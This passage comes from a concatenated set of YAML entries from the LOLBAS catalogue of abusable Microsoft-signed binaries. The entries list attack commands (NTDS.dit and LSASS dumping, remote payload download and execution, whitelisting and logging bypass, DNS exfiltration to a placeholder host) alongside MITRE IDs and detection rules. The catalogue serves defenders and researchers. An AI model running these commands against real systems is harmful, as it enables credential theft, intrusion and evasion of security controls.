      - `/TerminateWhen /TimeAfter 30 seconds` to auto-terminate after a relative time (e.g. 30 seconds);
      - `/TerminateWhen /Time 04:52:00 AM 9/17/2025` to auto-terminate at a specific date/time;
      - `/TerminateWhen /KeyPress x` to terminate when a specific key is pressed.
    Usecase: Capture network traffic on Windows to collect sensitive data.
    Category: Reconnaissance
    Privileges: Administrator
    MitreID: T1040
    OperatingSystem: Windows
Full_Path:
  - Path: C:\Program Files\Microsoft Network Monitor 3\nmcap.exe
  - Path: C:\Program Files (x86)\Microsoft Network Monitor 3\nmcap.exe
Resources:
  - Link: https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/network-monitor-3
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/Ntdsutil.yml
================================================
---
Name: ntdsutil.exe
Description: Command line utility used to export Active Directory.
Author: Tony Lambert
Created: 2020-01-10
Commands:
  - Command: ntdsutil.exe "ac i ntds" "ifm" "create full c:\" q q
    Description: Dump NTDS.dit into folder
    Usecase: Dumping of Active Directory NTDS.dit database
    Category: Dump
    Privileges: Administrator
    MitreID: T1003.003
    OperatingSystem: Windows
Full_Path:
  - Path: C:\Windows\System32\ntdsutil.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml
  - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/ntdsutil_export_ntds.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
  - IOC: ntdsutil.exe with command line including "ifm"
Resources:
  - Link: https://adsecurity.org/?p=2398#CreateIFM
Acknowledgement:
  - Person: Sean Metcalf
    Handle: '@PyroTek3'

================================================
FILE: yml/OtherMSBinaries/Ntsd.yml
================================================
---
Name: Ntsd.exe
Description: Symbolic Debugger for Windows.
Author: Avihay Eldad
Created: 2025-07-16
Commands:
  - Command: ntsd.exe -g {CMD}
    Description: Launches command through the debugging process; optionally add `-G` to exit the debugger automatically.
    Usecase: Executes an executable under a trusted Microsoft signed binary.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\ntsd.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\ntsd.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\arm\ntsd.exe
  - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\arm64\ntsd.exe
Resources:
  - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
  - Link: https://strontic.github.io/xcyclopedia/library/ntsd.exe-629EA12D527237B9CD945AC44C2DE80D.html
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/OpenConsole.yml
================================================
---
Name: OpenConsole.exe
Description: Console Window host for Windows Terminal
Author: Nasreddine Bencherchali
Created: 2022-06-17
Commands:
  - Command: OpenConsole.exe {PATH:.exe}
    Description: Execute specified process with OpenConsole.exe as parent process
    Usecase: Use OpenConsole.exe as a proxy binary to evade defensive counter-measures
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
  - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os86\OpenConsole.exe
  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\Terminal\ServiceHub\os64\OpenConsole.exe
  - Path: C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_1.18.10301.0_x64__8wekyb3d8bbwe\OpenConsole.exe
Detection:
  - IOC: OpenConsole.exe spawning unexpected processes
  - Sigma: https://github.com/SigmaHQ/sigma/blob/9e0ef7251b075f15e7abafbbec16d3230c5fa477/rules/windows/process_creation/proc_creation_win_lolbin_openconsole.yml
Resources:
  - Link: https://twitter.com/nas_bench/status/1537563834478645252
Acknowledgement:
  - Person: Nasreddine Bencherchali
    Handle: '@nas_bench'

================================================
FILE: yml/OtherMSBinaries/Pixtool.yml
================================================
---
Name: Pixtool.exe
Description: Command line utility for taking and analyzing PIX GPU captures.
Author: Avihay Eldad
Created: 2025-09-21
Commands:
  - Command: pixtool.exe launch {PATH_ABSOLUTE:.exe}
    Description: Launches an executable via the PIX command-line utility.
    Usecase: Executes an executable under a trusted, Microsoft signed binary.
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Program Files\Microsoft PIX\pixtool.exe
  - Path: C:\Program Files (x86)\Microsoft PIX\pixtool.exe
Resources:
  - Link: https://devblogs.microsoft.com/pix/pixtool/
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OtherMSBinaries/Powerpnt.yml
================================================
---
Name: Powerpnt.exe
Description: Microsoft Office binary.
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
  - Command: Powerpnt.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload and place it in INetCache.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\Powerpnt.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\Powerpnt.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\Powerpnt.exe
  - Path: C:\Program Files\Microsoft Office\Office16\Powerpnt.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\Powerpnt.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\Powerpnt.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\Powerpnt.exe
  - Path: C:\Program Files\Microsoft Office\Office15\Powerpnt.exe
  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\Powerpnt.exe
  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\Powerpnt.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\Powerpnt.exe
  - Path: C:\Program Files\Microsoft Office\Office14\Powerpnt.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office12\Powerpnt.exe
  - Path: C:\Program Files\Microsoft Office\Office12\Powerpnt.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_office.yml
  - IOC: Suspicious Office application Internet/network traffic
Resources:
  - Link: https://twitter.com/reegun21/status/1150032506504151040
  - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Acknowledgement:
  - Person: Reegun J (OCBC Bank)
    Handle: '@reegun21'

================================================
FILE: yml/OtherMSBinaries/Procdump.yml
================================================
---
Name: Procdump.exe
Description: SysInternals Memory Dump Tool
Aliases:
  - Alias: Procdump64.exe
Author: 'Alfie Champion (@ajpc500)'
Created: 2020-10-14
Commands:
  - Command: procdump.exe -md {PATH:.dll} explorer.exe
    Description: Loads the specified DLL, which must export a 'MiniDumpCallbackRoutine' function. A valid process must be provided, as a dump is still created.
    Usecase: Performs execution of unsigned DLL.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
    Tags:
      - Execute: DLL
  - Command: procdump.exe -md {PATH:.dll} foobar
    Description: Loads the specified DLL, running its DLL_PROCESS_ATTACH code; the process argument can be arbitrary.
    Usecase: Performs execution of unsigned DLL.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 8.1 and higher, Windows Server 2012 and higher
    Tags:
      - Execute: DLL
Full_Path:
  - Path: no default
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_sysinternals_procdump.yml
  - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/dump_lsass_via_procdump.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
  - IOC: Process creation with given '-md' parameter
  - IOC: Anomalous child processes of procdump
  - IOC: Unsigned DLL load via procdump.exe or procdump64.exe
Resources:
  - Link: https://twitter.com/ajpc500/status/1448588362382778372?s=20
Acknowledgement:
  - Person: Alfie Champion
    Handle: '@ajpc500'

================================================
FILE: yml/OtherMSBinaries/ProtocolHandler.yml
================================================
---
Name: ProtocolHandler.exe
Description: Microsoft Office binary
Author: Nir Chako
Created: 2022-07-24
Commands:
  - Command: ProtocolHandler.exe {REMOTEURL}
    Description: Downloads payload from remote server
    Usecase: "It will open the specified URL in the default web browser, which (if the URL points to a file) will often result in the file being downloaded to the user's Downloads folder (without user interaction)"
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\ProtocolHandler.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office\Office16\ProtocolHandler.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\ProtocolHandler.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\ProtocolHandler.exe
  - Path: C:\Program Files\Microsoft Office\Office15\ProtocolHandler.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_lolbin_protocolhandler_download.yml
  - IOC: Suspicious Office application Internet/network traffic
Acknowledgement:
  - Person: Nir Chako (Pentera)
    Handle: '@C_h4ck_0'

================================================
FILE: yml/OtherMSBinaries/Rcsi.yml
================================================
---
Name: rcsi.exe
Description: Non-interactive command line interface included with Visual Studio.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: rcsi.exe {PATH:.csx}
    Description: Use embedded C# within the csx script to execute the code.
    Usecase: Local execution of arbitrary C# code stored in local CSX file.
Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CSharp - Command: rcsi.exe {PATH:.csx} Description: Use embedded C# within the csx script to execute the code. Usecase: Local execution of arbitrary C# code stored in local CSX file. Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: CSharp Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - BlockRule: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml Resources: - Link: https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/ Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ================================================ FILE: yml/OtherMSBinaries/Remote.yml ================================================ --- Name: Remote.exe Description: Debugging tool included with Windows Debugging Tools Author: mr.d0x Created: 2021-06-01 Commands: - Command: Remote.exe /s {PATH:.exe} anythinghere Description: Spawns specified executable as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Command: Remote.exe /s {PATH:.exe} anythinghere Description: Spawns specified executable as a child process of remote.exe Usecase: Executes a process under a trusted Microsoft signed binary 
Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Command: Remote.exe /s {PATH_SMB:.exe} anythinghere Description: Run a remote file Usecase: Executing a remote binary without saving file to disk Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: EXE - Execute: Remote Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\remote.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\remote.exe Detection: - IOC: remote.exe process spawns - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_remote.yml Resources: - Link: https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/ Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ================================================ FILE: yml/OtherMSBinaries/Sqldumper.yml ================================================ --- Name: Sqldumper.exe Description: Debugging utility included with Microsoft SQL. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: sqldumper.exe 464 0 0x0110 Description: Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp). Usecase: Dump process using PID. Category: Dump Privileges: Administrator MitreID: T1003 OperatingSystem: Windows - Command: sqldumper.exe 540 0 0x01100:40 Description: 0x01100:40 flag will create a Mimikatz compatible dump file. Usecase: Dump LSASS.exe to Mimikatz compatible dump using PID. 
Category: Dump Privileges: Administrator MitreID: T1003.001 OperatingSystem: Windows Full_Path: - Path: C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe - Path: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe - Path: C:\Program Files\Microsoft Power BI Desktop\bin\SqlDumper.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml Resources: - Link: https://twitter.com/countuponsec/status/910969424215232518 - Link: https://twitter.com/countuponsec/status/910977826853068800 - Link: https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se Acknowledgement: - Person: Luis Rocha Handle: '@countuponsec' ================================================ FILE: yml/OtherMSBinaries/Sqlps.yml ================================================ --- Name: Sqlps.exe Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Sqlps.exe -noprofile Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging. Usecase: Execute PowerShell commands without ScriptBlock logging. 
Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe - Path: C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/execution_suspicious_powershell_imgload.toml - Splunk: https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md Resources: - Link: https://twitter.com/ManuelBerrueta/status/1527289261350760455 - Link: https://twitter.com/bryon_/status/975835709587075072 - Link: https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017 Acknowledgement: - Person: Bryon Handle: '@bryon_' - Person: Manny Handle: '@ManuelBerrueta' ================================================ FILE: yml/OtherMSBinaries/Sqltoolsps.yml ================================================ --- Name: SQLToolsPS.exe Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+. 
Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: SQLToolsPS.exe -noprofile -command Start-Process {PATH:.exe} Description: Run a SQL Server PowerShell mini-console without Module and ScriptBlock Logging. Usecase: Execute PowerShell command. Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows Tags: - Execute: PowerShell Full_Path: - Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml - Splunk: https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md Resources: - Link: https://twitter.com/pabraeken/status/993298228840992768 - Link: https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017 Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ================================================ FILE: yml/OtherMSBinaries/Squirrel.yml ================================================ --- Name: Squirrel.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. Author: 'Reegun J (OCBC Bank) - @reegun21' Created: 2019-06-26 Commands: - Command: squirrel.exe --download {REMOTEURL} Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: squirrel.exe --update {REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. 
Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: squirrel.exe --update {REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: squirrel.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: squirrel.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. 
Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Squirrel.exe' Code_Sample: - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml Resources: - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls - Link: https://twitter.com/reegun21/status/1144182772623269889 - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ - Link: https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12 - Link: https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56 Acknowledgement: - Person: Reegun J (OCBC Bank) Handle: '@reegun21' - Person: Adam Handle: '@Hexacorn' ================================================ FILE: yml/OtherMSBinaries/Te.yml ================================================ --- Name: te.exe Description: Testing tool included with Microsoft Test Authoring and Execution Framework (TAEF). Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: te.exe {PATH:.wsc} Description: Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file. Usecase: Execute Visual Basic script stored in local Windows Script Component file. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: WSH - Command: te.exe {PATH:.dll} Description: Execute commands from a DLL file with Test Authoring and Execution Framework (TAEF) tests. See resources section for required structures. Usecase: Execute DLL file. 
Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: DLL - Input: Custom Format Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_use_of_te_bin.yml Resources: - Link: https://twitter.com/gn3mes1s/status/927680266390384640 - Link: https://github.com/LOLBAS-Project/LOLBAS/pull/359 - Link: https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/authoring-tests Acknowledgement: - Person: Giuseppe N3mes1s Handle: '@gN3mes1s' - Person: Avihay Eldad Handle: '@AvihayEldad' ================================================ FILE: yml/OtherMSBinaries/Teams.yml ================================================ --- Name: Teams.exe Description: Electron runtime binary which runs the Teams application Author: Andrew Kisliakov Created: 2022-01-17 Commands: - Command: teams.exe Description: Generate JavaScript payload and package.json, and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app\\" before executing. Usecase: Execute JavaScript code Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: Node.JS - Command: teams.exe Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing. 
Usecase: Execute JavaScript code Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: Node.JS - Command: teams.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&" Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command Usecase: Executes a process under a trusted Microsoft signed binary Category: Execute Privileges: User MitreID: T1218.015 OperatingSystem: Windows 10, Windows 11 Tags: - Execute: CMD Full_Path: - Path: 'C:\Users\\AppData\Local\Microsoft\Teams\current\Teams.exe' Code_Sample: - Code: https://github.com/lltltk/LOLBAS-research/tree/master/Teams Detection: - IOC: "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app directory created" - IOC: "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar file created/modified by non-Teams installer/updater" - Sigma: https://github.com/SigmaHQ/sigma/blob/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/process_creation/proc_creation_win_susp_electron_exeuction_proxy.yml Resources: - Link: https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/ Acknowledgement: - Person: Andrew Kisliakov - Person: mr.d0x Handle: '@mrd0x' ================================================ FILE: yml/OtherMSBinaries/Testwindowremoteagent.yml ================================================ --- Name: TestWindowRemoteAgent.exe Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC Author: Onat Uzunyayla Created: 2023-08-21 Commands: - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000 Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS Usecase: Attackers may utilize this to exfiltrate data over DNS Category: Upload Privileges: User MitreID: T1048 OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Program Files\Microsoft Visual 
Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe Detection: - IOC: TestWindowRemoteAgent.exe spawning unexpectedly Acknowledgement: - Person: Onat Uzunyayla ================================================ FILE: yml/OtherMSBinaries/Tracker.yml ================================================ --- Name: Tracker.exe Description: Tool included with Microsoft .Net Framework. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. Category: Execute Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: DLL - Command: Tracker.exe /d {PATH:.dll} /c C:\Windows\write.exe Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions. Usecase: Injection of locally stored DLL file into target process. Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows Tags: - Execute: DLL Full_Path: - Path: no default Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tracker.yml Resources: - Link: https://twitter.com/subTee/status/793151392185589760 - Link: https://attack.mitre.org/wiki/Execution Acknowledgement: - Person: Casey Smith Handle: '@subTee' ================================================ FILE: yml/OtherMSBinaries/Update.yml ================================================ --- Name: Update.exe Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation. 
Author: Oddvar Moe Created: 2019-06-26 Commands: - Command: Update.exe --download {REMOTEURL} Description: The above binary will go to url and look for RELEASES file and download the nuget package. Usecase: Download binary Category: Download Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed - Command: Update.exe --update={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --update={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --update={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --update={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. 
Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --updateRollback={REMOTEURL} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. Usecase: Application Whitelisting Bypass Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: CMD - Execute: Remote - Command: Update.exe --updateRollback={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: AWL Bypass Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --updateRollback={PATH_SMB:folder} Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA. Usecase: Download and execute binary Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 7 and up with Microsoft Teams installed Tags: - Execute: Nuget - Execute: Remote - Command: Update.exe --processStart {PATH:.exe} --process-start-args "{CMD:args}" Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied. 
